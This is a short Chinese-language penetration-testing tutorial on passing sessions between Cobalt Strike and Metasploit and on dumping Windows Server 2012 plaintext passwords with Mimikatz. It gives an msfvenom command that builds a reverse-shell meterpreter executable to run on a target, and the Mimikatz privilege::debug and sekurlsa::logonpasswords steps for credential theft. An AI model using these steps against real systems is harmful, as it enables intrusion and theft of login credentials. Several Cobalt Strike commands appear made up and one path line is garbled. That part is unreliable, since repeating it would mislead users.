問題:cs與msf權限傳遞,以及mimikatz抓取win2012明文密碼。
一、CS與MSF權限傳遞
CS(Cobalt Strike)和MSF(Metasploit Framework)是兩種常用的滲透測試工具,它們都支持在滲透過程中傳遞權限。以下是兩者之間傳遞權限的一般步驟:
從Metasploit向Cobalt Strike傳遞會話
1. 在Metasploit中獲取會話:使用Metasploit滲透目標系統并獲得會話。
2. 啟動Metasploit RPC服務:在Metasploit控制臺中啟動RPC服務,以便Cobalt Strike可以與Metasploit通信。
? ?load msgrpc ServerHost=127.0.0.1 Pass=yourpassword
3. 配置Cobalt Strike:在Cobalt Strike中配置Metasploit RPC設置,使其能夠連接到Metasploit的RPC服務。
?metasploit_rpc_login("127.0.0.1", 55553, "yourpassword")
4. 傳遞會話:在Cobalt Strike中使用`metasploit_import`命令導入Metasploit會話。
從Cobalt Strike向Metasploit傳遞會話?
1. 在Cobalt Strike中獲取會話:使用Cobalt Strike滲透目標系統并獲得會話。
2. 生成Payload:在Metasploit中生成一個Payload,用于接收Cobalt Strike的會話。
? ?msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f exe > payload.exe
3. 在Cobalt Strike中執行Payload:將生成的Payload上傳到目標系統并執行,以便Metasploit接收到會話。
4. 接收會話:在Metasploit中配置并監聽相應的端口,以接收傳遞過來的會話。
二、 使用Mimikatz抓取Windows 2012明文密碼
Mimikatz是一款強大的工具,用于從Windows系統中提取明文密碼、哈希、PIN碼等。以下是使用Mimikatz抓取Windows 2012明文密碼的步驟:
1. 下載并解壓Mimikatz:從GitHub上下載Mimikatz工具,并解壓到本地。
2. 以管理員身份運行命令提示符:打開命令提示符,并以管理員身份運行。
3. 執行Mimikatz:導航到Mimikatz所在目錄,并啟動Mimikatz。
? ?cd path\to\mimikatzmimikatz.exe
4.啟用調試特權:在Mimikatz控制臺中啟用調試特權。
? ?privilege::debug
5. 抓取明文密碼:使用以下命令來抓取明文密碼。
?
? ?sekurlsa::logonpasswords